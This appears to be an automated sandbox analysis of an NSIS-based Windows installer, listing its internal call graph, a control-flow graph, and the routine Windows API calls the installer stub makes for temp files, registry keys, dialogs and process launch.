4473->4474 4475 404eb7 4473->4475 4474->4447 4475->4472 4488 406521 lstrcpynW 4476->4488 4478 404eee 4489 406468 wsprintfW 4478->4489 4480 404ef8 4481 40140b 2 API calls 4480->4481 4482 404f01 4481->4482 4490 406521 lstrcpynW 4482->4490 4484 404f08 4484->4464 4491 404d4d 4485->4491 4487 404e2b 4487->4437 4488->4478 4489->4480 4490->4484 4492 404d66 4491->4492 4493 40655e 21 API calls 4492->4493 4494 404dca 4493->4494 4495 40655e 21 API calls 4494->4495 4496 404dd5 4495->4496 4497 40655e 21 API calls 4496->4497 4498 404deb lstrlenW wsprintfW SetDlgItemTextW 4497->4498 4498->4487 4499 40248f 4500 402dab 21 API calls 4499->4500 4501 4024a1 4500->4501 4502 402dab 21 API calls 4501->4502 4503 4024ab 4502->4503 4516 402e3b 4503->4516 4506 4024e3 4510 402d89 21 API calls 4506->4510 4512 4024ef 4506->4512 4507 402dab 21 API calls 4509 4024d9 lstrlenW 4507->4509 4508 402933 4509->4506 4510->4512 4511 40250e RegSetValueExW 4514 402524 RegCloseKey 4511->4514 4512->4511 4513 4032b9 39 API calls 4512->4513 4513->4511 4514->4508 4517 402e56 4516->4517 4520 4063bc 4517->4520 4521 4063cb 4520->4521 4522 4024bb 4521->4522 4523 4063d6 RegCreateKeyExW 4521->4523 4522->4506 4522->4507 4522->4508 4523->4522 4524 404610 lstrlenW 4525 404631 WideCharToMultiByte 4524->4525 4526 40462f 4524->4526 4526->4525 4527 402910 4528 402dab 21 API calls 4527->4528 4529 402917 FindFirstFileW 4528->4529 4530 40293f 4529->4530 4533 40292a 4529->4533 4535 406468 wsprintfW 4530->4535 4532 402948 4536 406521 lstrcpynW 4532->4536 4535->4532 4536->4533 4537 401911 4538 401948 4537->4538 4539 402dab 21 API calls 4538->4539 4540 40194d 4539->4540 4541 405c2d 71 API calls 4540->4541 4542 401956 4541->4542 4543 404991 4544 4049bd 4543->4544 4545 4049ce 4543->4545 4604 405b65 GetDlgItemTextW 4544->4604 4547 4049da GetDlgItem 4545->4547 4554 404a39 4545->4554 4550 4049ee 4547->4550 4548 404b1d 4553 404ccc 4548->4553 4606 405b65 GetDlgItemTextW 4548->4606 4549 4049c8 4551 4067cf 5 API calls 4549->4551 4552 404a02 SetWindowTextW 4550->4552 4556 405e9b 4 API calls 4550->4556 4551->4545 4557 4044a0 22 API calls 4552->4557 4560 404507 8 API calls 4553->4560 4554->4548 4554->4553 4558 40655e 21 API calls 4554->4558 4562 4049f8 4556->4562 4563 404a1e 4557->4563 4564 404aad SHBrowseForFolderW 4558->4564 4559 404b4d 4565 405ef8 18 API calls 4559->4565 4561 404ce0 4560->4561 4562->4552 4569 405df0 3 API calls 4562->4569 4566 4044a0 22 API calls 4563->4566 4564->4548 4567 404ac5 CoTaskMemFree 4564->4567 4568 404b53 4565->4568 4570 404a2c 4566->4570 4571 405df0 3 API calls 4567->4571 4607 406521 lstrcpynW 4568->4607 4569->4552 4605 4044d5 SendMessageW 4570->4605 4573 404ad2 4571->4573 4576 404b09 SetDlgItemTextW 4573->4576 4580 40655e 21 API calls 4573->4580 4575 404a32 4578 406915 5 API calls 4575->4578 4576->4548 4577 404b6a 4579 406915 5 API calls 4577->4579 4578->4554 4586 404b71 4579->4586 4581 404af1 lstrcmpiW 4580->4581 4581->4576 4584 404b02 lstrcatW 4581->4584 4582 404bb2 4608 406521 lstrcpynW 4582->4608 4584->4576 4585 404bb9 4587 405e9b 4 API calls 4585->4587 4586->4582 4590 405e3c 2 API calls 4586->4590 4592 404c0a 4586->4592 4588 404bbf GetDiskFreeSpaceW 4587->4588 4591 404be3 MulDiv 4588->4591 4588->4592 4590->4586 4591->4592 4593 404c7b 4592->4593 4595 404e16 24 API calls 4592->4595 4594 404c9e 4593->4594 4596 40140b 2 API calls 4593->4596 4609 4044c2 KiUserCallbackDispatcher 4594->4609 4597 404c68 4595->4597 4596->4594 4599 404c7d SetDlgItemTextW 4597->4599 4600 404c6d 4597->4600 4599->4593 4602 404d4d 24 API calls 4600->4602 4601 404cba 4601->4553 4603 4048ea SendMessageW 4601->4603 4602->4593 4603->4553 4604->4549 4605->4575 4606->4559 4607->4577 4608->4585 4609->4601 4610 401491 4611 4055a6 28 API calls 4610->4611 4612 401498 4611->4612 4613 401914 4614 402dab 21 API calls 4613->4614 4615 40191b 4614->4615 4616 405b81 MessageBoxIndirectW 4615->4616 4617 401924 4616->4617 4618 402896 4619 40289d 4618->4619 4625 402bae 4618->4625 4620 402d89 21 API calls 4619->4620 4621 4028a4 4620->4621 4622 4028b3 SetFilePointer 4621->4622 4623 4028c3 4622->4623 4622->4625 4626 406468 wsprintfW 4623->4626 4626->4625 3598 401f17 3599 402dab 21 API calls 3598->3599 3600 401f1d 3599->3600 3601 402dab 21 API calls 3600->3601 3602 401f26 3601->3602 3603 402dab 21 API calls 3602->3603 3604 401f2f 3603->3604 3605 402dab 21 API calls 3604->3605 3606 401f38 3605->3606 3607 401423 28 API calls 3606->3607 3608 401f3f 3607->3608 3615 405b47 ShellExecuteExW 3608->3615 3610 401f87 3611 402933 3610->3611 3616 4069c0 WaitForSingleObject 3610->3616 3613 401fa4 FindCloseChangeNotification 3613->3611 3615->3610 3617 4069da 3616->3617 3618 4069ec GetExitCodeProcess 3617->3618 3621 406951 3617->3621 3618->3613 3622 40696e PeekMessageW 3621->3622 3623 406964 DispatchMessageW 3622->3623 3624 40697e WaitForSingleObject 3622->3624 3623->3622 3624->3617 4627 402f98 4628 402fc3 4627->4628 4629 402faa SetTimer 4627->4629 4630 403018 4628->4630 4631 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4628->4631 4629->4628 4631->4630 3625 403b19 3626 403b31 3625->3626 3627 403b23 CloseHandle 3625->3627 3632 403b5e 3626->3632 3627->3626 3633 403b6c 3632->3633 3634 403b36 3633->3634 3635 403b71 FreeLibrary GlobalFree 3633->3635 3636 405c2d 3634->3636 3635->3634 3635->3635 3672 405ef8 3636->3672 3639 405c55 DeleteFileW 3669 403b42 3639->3669 3640 405c6c 3641 405d8c 3640->3641 3686 406521 lstrcpynW 3640->3686 3648 40687e 2 API calls 3641->3648 3641->3669 3643 405c92 3644 405ca5 3643->3644 3645 405c98 lstrcatW 3643->3645 3687 405e3c lstrlenW 3644->3687 3646 405cab 3645->3646 3649 405cbb lstrcatW 3646->3649 3651 405cc6 lstrlenW FindFirstFileW 3646->3651 3650 405db1 3648->3650 3649->3651 3652 405df0 3 API calls 3650->3652 3650->3669 3651->3641 3653 405ce8 3651->3653 3654 405dbb 3652->3654 3655 405d6f FindNextFileW 3653->3655 3665 405c2d 64 API calls 3653->3665 3667 4055a6 28 API calls 3653->3667 3670 4055a6 28 API calls 3653->3670 3691 406521 lstrcpynW 3653->3691 3692 405be5 3653->3692 3700 4062e1 MoveFileExW 3653->3700 3656 405be5 5 API calls 3654->3656 3655->3653 3659 405d85 FindClose 3655->3659 3658 405dc7 3656->3658 3660 405de1 3658->3660 3661 405dcb 3658->3661 3659->3641 3663 4055a6 28 API calls 3660->3663 3664 4055a6 28 API calls 3661->3664 3661->3669 3663->3669 3666 405dd8 3664->3666 3665->3653 3668 4062e1 40 API calls 3666->3668 3667->3655 3668->3669 3670->3653 3704 406521 lstrcpynW 3672->3704 3674 405f09 3675 405e9b 4 API calls 3674->3675 3676 405f0f 3675->3676 3677 405c4d 3676->3677 3678 4067cf 5 API calls 3676->3678 3677->3639 3677->3640 3684 405f1f 3678->3684 3679 405f50 lstrlenW 3680 405f5b 3679->3680 3679->3684 3682 405df0 3 API calls 3680->3682 3681 40687e 2 API calls 3681->3684 3683 405f60 GetFileAttributesW 3682->3683 3683->3677 3684->3677 3684->3679 3684->3681 3685 405e3c 2 API calls 3684->3685 3685->3679 3686->3643 3688 405e4a 3687->3688 3689 405e50 CharPrevW 3688->3689 3690 405e5c 3688->3690 3689->3688 3689->3690 3690->3646 3691->3653 3693 405fec 2 API calls 3692->3693 3694 405bf1 3693->3694 3695 405c12 3694->3695 3696 405c00 RemoveDirectoryW 3694->3696 3697 405c08 DeleteFileW 3694->3697 3695->3653 3698 405c0e 3696->3698 3697->3698 3698->3695 3699 405c1e SetFileAttributesW 3698->3699 3699->3695 3701 406302 3700->3701 3702 4062f5 3700->3702 3701->3653 3705 406167 3702->3705 3704->3674 3706 406197 3705->3706 3707 4061bd GetShortPathNameW 3705->3707 3732 406011 GetFileAttributesW CreateFileW 3706->3732 3709 4061d2 3707->3709 3710 4062dc 3707->3710 3709->3710 3712 4061da wsprintfA 3709->3712 3710->3701 3711 4061a1 CloseHandle GetShortPathNameW 3711->3710 3713 4061b5 3711->3713 3714 40655e 21 API calls 3712->3714 3713->3707 3713->3710 3715 406202 3714->3715 3733 406011 GetFileAttributesW CreateFileW 3715->3733 3717 40620f 3717->3710 3718 40621e GetFileSize GlobalAlloc 3717->3718 3719 406240 3718->3719 3720 4062d5 CloseHandle 3718->3720 3721 406094 ReadFile 3719->3721 3720->3710 3722 406248 3721->3722 3722->3720 3734 405f76 lstrlenA 3722->3734 3725 406273 3727 405f76 4 API calls 3725->3727 3726 40625f lstrcpyA 3728 406281 3726->3728 3727->3728 3729 4062b8 SetFilePointer 3728->3729 3730 4060c3 WriteFile 3729->3730 3731 4062ce GlobalFree 3730->3731 3731->3720 3732->3711 3733->3717 3735 405fb7 lstrlenA 3734->3735 3736 405f90 lstrcmpiA 3735->3736 3737 405fbf 3735->3737 3736->3737 3738 405fae CharNextA 3736->3738 3737->3725 3737->3726 3738->3735 4632 40551a 4633 40552a 4632->4633 4634 40553e 4632->4634 4635 405530 4633->4635 4636 405587 4633->4636 4637 405546 IsWindowVisible 4634->4637 4643 40555d 4634->4643 4639 4044ec SendMessageW 4635->4639 4638 40558c CallWindowProcW 4636->4638 4637->4636 4640 405553 4637->4640 4641 40553a 4638->4641 4639->4641 4642 404e5b 5 API calls 4640->4642 4642->4643 4643->4638 4644 404edb 4 API calls 4643->4644 4644->4636 4645 401d1c 4646 402d89 21 API calls 4645->4646 4647 401d22 IsWindow 4646->4647 4648 401a25 4647->4648 4649 40149e 4650 4014ac PostQuitMessage 4649->4650 4651 4023a2 4649->4651 4650->4651 3204 401ba0 3205 401bf1 3204->3205 3206 401bad 3204->3206 3207 401bf6 3205->3207 3208 401c1b GlobalAlloc 3205->3208 3209 401c36 3206->3209 3212 401bc4 3206->3212 3218 4023a2 3207->3218 3223 406521 lstrcpynW 3207->3223 3224 40655e 3208->3224 3210 40655e 21 API calls 3209->3210 3209->3218 3213 40239c 3210->3213 3241 406521 lstrcpynW 3212->3241 3243 405b81 3213->3243 3216 401c08 GlobalFree 3216->3218 3217 401bd3 3242 406521 lstrcpynW 3217->3242 3221 401be2 3247 406521 lstrcpynW 3221->3247 3223->3216 3239 406569 3224->3239 3225 4067b0 3226 4067c9 3225->3226 3270 406521 lstrcpynW 3225->3270 3226->3209 3228 406781 lstrlenW 3228->3239 3232 40667a GetSystemDirectoryW 3232->3239 3233 40655e 15 API calls 3233->3228 3234 406690 GetWindowsDirectoryW 3234->3239 3235 40655e 15 API calls 3235->3239 3236 406722 lstrcatW 3236->3239 3239->3225 3239->3228 3239->3232 3239->3233 3239->3234 3239->3235 3239->3236 3240 4066f2 SHGetPathFromIDListW CoTaskMemFree 3239->3240 3248 4063ef 3239->3248 3253 406915 GetModuleHandleA 3239->3253 3259 4067cf 3239->3259 3268 406468 wsprintfW 3239->3268 3269 406521 lstrcpynW 3239->3269 3240->3239 3241->3217 3242->3221 3244 405b96 3243->3244 3245 405baa MessageBoxIndirectW 3244->3245 3246 405be2 3244->3246 3245->3246 3246->3218 3247->3218 3271 40638e 3248->3271 3251 406423 RegQueryValueExW RegCloseKey 3252 406453 3251->3252 3252->3239 3254 406931 3253->3254 3255 40693b GetProcAddress 3253->3255 3275 4068a5 GetSystemDirectoryW 3254->3275 3257 40694a 3255->3257 3257->3239 3258 406937 3258->3255 3258->3257 3266 4067dc 3259->3266 3260 406857 CharPrevW 3264 406852 3260->3264 3261 406845 CharNextW 3261->3264 3261->3266 3262 406878 3262->3239 3264->3260 3264->3262 3265 406831 CharNextW 3265->3266 3266->3261 3266->3264 3266->3265 3267 406840 CharNextW 3266->3267 3278 405e1d 3266->3278 3267->3261 3268->3239 3269->3239 3270->3226 3272 40639d 3271->3272 3273 4063a1 3272->3273 3274 4063a6 RegOpenKeyExW 3272->3274 3273->3251 3273->3252 3274->3273 3276 4068c7 wsprintfW LoadLibraryExW 3275->3276 3276->3258 3279 405e23 3278->3279 3280 405e39 3279->3280 3281 405e2a CharNextW 3279->3281 3280->3266 3281->3279 3298 403fa1 3299 403fb9 3298->3299 3300 40411a 3298->3300 3299->3300 3301 403fc5 3299->3301 3302 40412b GetDlgItem GetDlgItem 3300->3302 3311 40416b 3300->3311 3303 403fd0 SetWindowPos 3301->3303 3304 403fe3 3301->3304 3305 4044a0 22 API calls 3302->3305 3303->3304 3308 403fec ShowWindow 3304->3308 3309 40402e 3304->3309 3310 404155 SetClassLongW 3305->3310 3306 4041c5 3321 404115 3306->3321 3371 4044ec 3306->3371 3313 404107 3308->3313 3314 40400c GetWindowLongW 3308->3314 3315 404036 DestroyWindow 3309->3315 3316 40404d 3309->3316 3317 40140b 2 API calls 3310->3317 3311->3306 3312 401389 2 API calls 3311->3312 3318 40419d 3312->3318 3393 404507 3313->3393 3314->3313 3320 404025 ShowWindow 3314->3320 3322 404429 3315->3322 3323 404052 SetWindowLongW 3316->3323 3324 404063 3316->3324 3317->3311 3318->3306 3325 4041a1 SendMessageW 3318->3325 3320->3309 3322->3321 3331 40445a ShowWindow 3322->3331 3323->3321 3324->3313 3328 40406f GetDlgItem 3324->3328 3325->3321 3326 40140b 2 API calls 3362 4041d7 3326->3362 3327 40442b DestroyWindow KiUserCallbackDispatcher 3327->3322 3329 404080 SendMessageW IsWindowEnabled 3328->3329 3330 40409d 3328->3330 3329->3321 3329->3330 3333 4040aa 3330->3333 3334 4040f1 SendMessageW 3330->3334 3335 4040bd 3330->3335 3344 4040a2 3330->3344 3331->3321 3332 40655e 21 API calls 3332->3362 3333->3334 3333->3344 3334->3313 3337 4040c5 3335->3337 3338 4040da 3335->3338 3387 40140b 3337->3387 3340 40140b 2 API calls 3338->3340 3339 4040d8 3339->3313 3343 4040e1 3340->3343 3341 4044a0 22 API calls 3341->3362 3343->3313 3343->3344 3390 404479 3344->3390 3346 404252 GetDlgItem 3347 404267 3346->3347 3348 40426f ShowWindow KiUserCallbackDispatcher 3346->3348 3347->3348 3377 4044c2 KiUserCallbackDispatcher 3348->3377 3350 404299 EnableWindow 3355 4042ad 3350->3355 3351 4042b2 GetSystemMenu EnableMenuItem SendMessageW 3352 4042e2 SendMessageW 3351->3352 3351->3355 3352->3355 3355->3351 3378 4044d5 SendMessageW 3355->3378 3379 403f82 3355->3379 3382 406521 lstrcpynW 3355->3382 3357 404311 lstrlenW 3358 40655e 21 API calls 3357->3358 3359 404327 SetWindowTextW 3358->3359 3383 401389 3359->3383 3361 40436b DestroyWindow 3361->3322 3363 404385 CreateDialogParamW 3361->3363 3362->3321 3362->3326 3362->3327 3362->3332 3362->3341 3362->3361 3374 4044a0 3362->3374 3363->3322 3364 4043b8 3363->3364 3365 4044a0 22 API calls 3364->3365 3366 4043c3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3365->3366 3367 401389 2 API calls 3366->3367 3368 404409 3367->3368 3368->3321 3369 404411 ShowWindow 3368->3369 3370 4044ec SendMessageW 3369->3370 3370->3322 3372 404504 3371->3372 3373 4044f5 SendMessageW 3371->3373 3372->3362 3373->3372 3375 40655e 21 API calls 3374->3375 3376 4044ab SetDlgItemTextW 3375->3376 3376->3346 3377->3350 3378->3355 3380 40655e 21 API calls 3379->3380 3381 403f90 SetWindowTextW 3380->3381 3381->3355 3382->3357 3385 401390 3383->3385 3384 4013fe 3384->3362 3385->3384 3386 4013cb MulDiv SendMessageW 3385->3386 3386->3385 3388 401389 2 API calls 3387->3388 3389 401420 3388->3389 3389->3344 3391 404480 3390->3391 3392 404486 SendMessageW 3390->3392 3391->3392 3392->3339 3394 4045ca 3393->3394 3395 40451f GetWindowLongW 3393->3395 3394->3321 3395->3394 3396 404534 3395->3396 3396->3394 3397 404561 GetSysColor 3396->3397 3398 404564 3396->3398 3397->3398 3399 404574 SetBkMode 3398->3399 3400 40456a SetTextColor 3398->3400 3401 404592 3399->3401 3402 40458c GetSysColor 3399->3402 3400->3399 3403 4045a3 3401->3403 3404 404599 SetBkColor 3401->3404 3402->3401 3403->3394 3405 4045b6 DeleteObject 3403->3405 3406 4045bd CreateBrushIndirect 3403->3406 3404->3403 3405->3406 3406->3394 4652 402621 4653 402dab 21 API calls 4652->4653 4654 402628 4653->4654 4657 406011 GetFileAttributesW CreateFileW 4654->4657 4656 402634 4657->4656 4665 4025a3 4675 402deb 4665->4675 4668 402d89 21 API calls 4669 4025b6 4668->4669 4670 4025d2 RegEnumKeyW 4669->4670 4671 4025de RegEnumValueW 4669->4671 4673 402933 4669->4673 4672 4025f3 RegCloseKey 4670->4672 4671->4672 4672->4673 4676 402dab 21 API calls 4675->4676 4677 402e02 4676->4677 4678 40638e RegOpenKeyExW 4677->4678 4679 4025ad 4678->4679 4679->4668 4680 4015a8 4681 402dab 21 API calls 4680->4681 4682 4015af SetFileAttributesW 4681->4682 4683 4015c1 4682->4683 3739 401fa9 3740 402dab 21 API calls 3739->3740 3741 401faf 3740->3741 3742 4055a6 28 API calls 3741->3742 3743 401fb9 3742->3743 3752 405b04 CreateProcessW 3743->3752 3746 401fe2 FindCloseChangeNotification 3749 402933 3746->3749 3748 4069c0 5 API calls 3750 401fd4 3748->3750 3750->3746 3755 406468 wsprintfW 3750->3755 3753 401fbf 3752->3753 3754 405b37 CloseHandle 3752->3754 3753->3746 3753->3748 3753->3749 3754->3753 3755->3746 4684 40202f 4685 402dab 21 API calls 4684->4685 4686 402036 4685->4686 4687 406915 5 API calls 4686->4687 4688 402045 4687->4688 4689 402061 GlobalAlloc 4688->4689 4690 4020d1 4688->4690 4689->4690 4691 402075 4689->4691 4692 406915 5 API calls 4691->4692 4693 40207c 4692->4693 4694 406915 5 API calls 4693->4694 4695 402086 4694->4695 4695->4690 4699 406468 wsprintfW 4695->4699 4697 4020bf 4700 406468 wsprintfW 4697->4700 4699->4697 4700->4690 4701 40252f 4702 402deb 21 API calls 4701->4702 4703 402539 4702->4703 4704 402dab 21 API calls 4703->4704 4705 402542 4704->4705 4706 40254d RegQueryValueExW 4705->4706 4708 402933 4705->4708 4707 40256d 4706->4707 4709 402573 RegCloseKey 4706->4709 4707->4709 4712 406468 wsprintfW 4707->4712 4709->4708 4712->4709 4713 4021af 4714 402dab 21 API calls 4713->4714 4715 4021b6 4714->4715 4716 402dab 21 API calls 4715->4716 4717 4021c0 4716->4717 4718 402dab 21 API calls 4717->4718 4719 4021ca 4718->4719 4720 402dab 21 API calls 4719->4720 4721 4021d4 4720->4721 4722 402dab 21 API calls 4721->4722 4723 4021de 4722->4723 4724 40221d CoCreateInstance 4723->4724 4725 402dab 21 API calls 4723->4725 4728 40223c 4724->4728 4725->4724 4726 401423 28 API calls 4727 4022fb 4726->4727 4728->4726 4728->4727 4729 403bb1 4730 403bbc 4729->4730 4731 403bc0 4730->4731 4732 403bc3 GlobalAlloc 4730->4732 4732->4731 4740 401a35 4741 402dab 21 API calls 4740->4741 4742 401a3e ExpandEnvironmentStringsW 4741->4742 4743 401a52 4742->4743 4744 401a65 4742->4744 4743->4744 4745 401a57 lstrcmpW 4743->4745 4745->4744 4751 4023b7 4752 4023bf 4751->4752 4755 4023c5 4751->4755 4753 402dab 21 API calls 4752->4753 4753->4755 4754 4023d3 4757 402dab 21 API calls 4754->4757 4759 4023e1 4754->4759 4755->4754 4756 402dab 21 API calls 4755->4756 4756->4754 4757->4759 4758 402dab 21 API calls 4760 4023ea WritePrivateProfileStringW 4758->4760 4759->4758 4761 4014b8 4762 4014be 4761->4762 4763 401389 2 API calls 4762->4763 4764 4014c6 4763->4764 4765 402439 4766 402441 4765->4766 4767 40246c 4765->4767 4769 402deb 21 API calls 4766->4769 4768 402dab 21 API calls 4767->4768 4771 402473 4768->4771 4770 402448 4769->4770 4773 402dab 21 API calls 4770->4773 4775 402480 4770->4775 4776 402e69 4771->4776 4774 402459 RegDeleteValueW RegCloseKey 4773->4774 4774->4775 4777 402e7d 4776->4777 4779 402e76 4776->4779 4777->4779 4780 402eae 4777->4780 4779->4775 4781 40638e RegOpenKeyExW 4780->4781 4782 402edc 4781->4782 4783 402eec RegEnumValueW 4782->4783 4784 402f0f 4782->4784 4791 402f86 4782->4791 4783->4784 4785 402f76 RegCloseKey 4783->4785 4784->4785 4786 402f4b RegEnumKeyW 4784->4786 4787 402f54 RegCloseKey 4784->4787 4789 402eae 6 API calls 4784->4789 4785->4791 4786->4784 4786->4787 4788 406915 5 API calls 4787->4788 4790 402f64 4788->4790 4789->4784 4790->4791 4792 402f68 RegDeleteKeyW 4790->4792 4791->4779 4792->4791 4793 40173a 4794 402dab 21 API calls 4793->4794 4795 401741 SearchPathW 4794->4795 4796 40175c 4795->4796 4797 401d3d 4798 402d89 21 API calls 4797->4798 4799 401d44 4798->4799 4800 402d89 21 API calls 4799->4800 4801 401d50 GetDlgItem 4800->4801 4802 40263d 4801->4802 4803 406c3f 4805 406ac3 4803->4805 4804 40742e 4805->4804 4806 406b44 GlobalFree 4805->4806 4807 406b4d GlobalAlloc 4805->4807 4808 406bc4 GlobalAlloc 4805->4808 4809 406bbb GlobalFree 4805->4809 4806->4807 4807->4804 4807->4805 4808->4804 4808->4805 4809->4808

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 0 4034fc-40354e SetErrorMode GetVersionExW 1 403550-403580 GetVersionExW 0->1 2 403588-40358d 0->2 1->2 3 403595-4035d7 2->3 4 40358f 2->4 5 4035d9-4035e1 call 406915 3->5 6 4035ea 3->6 4->3 5->6 11 4035e3 5->11 8 4035ef-403603 call 4068a5 lstrlenA 6->8 13 403605-403621 call 406915 * 3 8->13 11->6 20 403632-403696 #17 OleInitialize SHGetFileInfoW call 406521 GetCommandLineW call 406521 13->20 21 403623-403629 13->21 28 403698-40369a 20->28 29 40369f-4036b3 call 405e1d CharNextW 20->29 21->20 25 40362b 21->25 25->20 28->29 32 4037ae-4037b4 29->32 33 4036b8-4036be 32->33 34 4037ba 32->34 35 4036c0-4036c5 33->35 36 4036c7-4036ce 33->36 37 4037ce-4037e8 GetTempPathW call 4034cb 34->37 35->35 35->36 38 4036d0-4036d5 36->38 39 4036d6-4036da 36->39 47 403840-40385a DeleteFileW call 403082 37->47 48 4037ea-403808 GetWindowsDirectoryW lstrcatW call 4034cb 37->48 38->39 41 4036e0-4036e6 39->41 42 40379b-4037aa call 405e1d 39->42 45 403700-403739 41->45 46 4036e8-4036ef 41->46 42->32 58 4037ac-4037ad 42->58 53 403756-403790 45->53 54 40373b-403740 45->54 51 4036f1-4036f4 46->51 52 4036f6 46->52 64 403860-403866 47->64 65 403a47-403a57 ExitProcess OleUninitialize 47->65 48->47 62 40380a-40383a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034cb 48->62 51->45 51->52 52->45 56 403792-403796 53->56 57 403798-40379a 53->57 54->53 60 403742-40374a 54->60 56->57 63 4037bc-4037c9 call 406521 56->63 57->42 58->32 66 403751 60->66 67 40374c-40374f 60->67 62->47 62->65 63->37 71 40386c-403877 call 405e1d 64->71 72 4038ff-403906 call 403bf3 64->72 69 403a59-403a69 call 405b81 ExitProcess 65->69 70 403a7d-403a83 65->70 66->53 67->53 67->66 77 403b01-403b09 70->77 78 403a85-403a9b GetCurrentProcess OpenProcessToken 70->78 87 4038c5-4038cf 71->87 88 403879-4038ae 71->88 86 40390b-40390f 72->86 80 403b0b 77->80 81 403b0f-403b13 ExitProcess 77->81 84 403ad1-403adf call 406915 78->84 85 403a9d-403acb LookupPrivilegeValueW AdjustTokenPrivileges 78->85 80->81 98 403ae1-403aeb 84->98 99 403aed-403af8 ExitWindowsEx 84->99 85->84 86->65 90 4038d1-4038df call 405ef8 87->90 91 403914-40393a call 405aec lstrlenW call 406521 87->91 92 4038b0-4038b4 88->92 90->65 105 4038e5-4038fb call 406521 * 2 90->105 110 40394b-403963 91->110 111 40393c-403946 call 406521 91->111 96 4038b6-4038bb 92->96 97 4038bd-4038c1 92->97 96->97 103 4038c3 96->103 97->92 97->103 98->99 101 403afa-403afc call 40140b 98->101 99->77 99->101 101->77 103->87 105->72 114 403968-40396c 110->114 111->110 116 403971-40399b wsprintfW call 40655e 114->116 120 4039a4 call 405acf 116->120 121 40399d-4039a2 call 405a75 116->121 125 4039a9-4039ab 120->125 121->125 126 4039e7-403a06 SetCurrentDirectoryW call 4062e1 CopyFileW 125->126 127 4039ad-4039b7 GetFileAttributesW 125->127 135 403a45 126->135 136 403a08-403a29 call 4062e1 call 40655e call 405b04 126->136 129 4039d8-4039e3 127->129 130 4039b9-4039c2 DeleteFileW 127->130 129->114 131 4039e5 129->131 130->129 133 4039c4-4039d6 call 405c2d 130->133 131->65 133->116 133->129 135->65 144 403a2b-403a35 136->144 145 403a6f-403a7b CloseHandle 136->145 144->135 146 403a37-403a3f call 40687e 144->146 145->135 146->116 146->135
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetErrorMode.KERNELBASE ref: 0040351F
                                                                                                                                                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040354A
                                                                                                                                                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040355D
                                                                                                                                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 004035F6
                                                                                                                                                                                          • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403633
                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 0040363A
                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403659
                                                                                                                                                                                          • GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040366E
                                                                                                                                                                                          • CharNextW.USER32(00000000,00434000,00000020,00434000,00000000,?,00000008,0000000A,0000000C), ref: 004036A7
                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037DF
                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037F0
                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004037FC
                                                                                                                                                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403818
                                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403829
                                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403831
                                                                                                                                                                                          • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403845
                                                                                                                                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00434000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040391E
                                                                                                                                                                                            • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                                                                                                                                          • wsprintfW.USER32 ref: 0040397B
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsxA3A4.tmp,C:\Users\user\AppData\Local\Temp\), ref: 004039AE
                                                                                                                                                                                          • DeleteFileW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsxA3A4.tmp), ref: 004039BA
                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004039E8
                                                                                                                                                                                            • Part of subcall function 004062E1: MoveFileExW.KERNEL32(?,?,00000005,00405DDF,?,00000000,000000F1,?,?,?,?,?), ref: 004062EB
                                                                                                                                                                                          • CopyFileW.KERNEL32(00437800,C:\Users\user\AppData\Local\Temp\nsxA3A4.tmp,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004039FE
                                                                                                                                                                                            • Part of subcall function 00405B04: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,C:\Users\user\AppData\Local\Temp\nsxA3A4.tmp,?), ref: 00405B2D
                                                                                                                                                                                            • Part of subcall function 00405B04: CloseHandle.KERNEL32(?,?,?,C:\Users\user\AppData\Local\Temp\nsxA3A4.tmp,?), ref: 00405B3A
